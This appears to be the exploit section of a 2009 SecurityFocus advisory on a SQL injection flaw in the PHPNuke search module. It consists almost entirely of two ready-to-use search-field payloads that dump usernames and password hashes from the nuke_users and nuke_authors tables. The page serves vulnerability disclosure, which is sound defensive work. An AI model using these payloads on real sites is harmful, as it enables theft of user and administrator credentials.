Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

PHPNuke Search Module SQL Injection Vulnerability

No exploit is required.

The following proof-of-concept search-field data is available:
s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/* -> users passwords and logins

s%') UNION SELECT 0,pwd,name,aid,0,0,0,0,0,0 FROM nuke_authors/* -> nuke_authors passwords and logins

Proof-of-concept examples are available:







 

Privacy Statement
Copyright 2009, SecurityFocus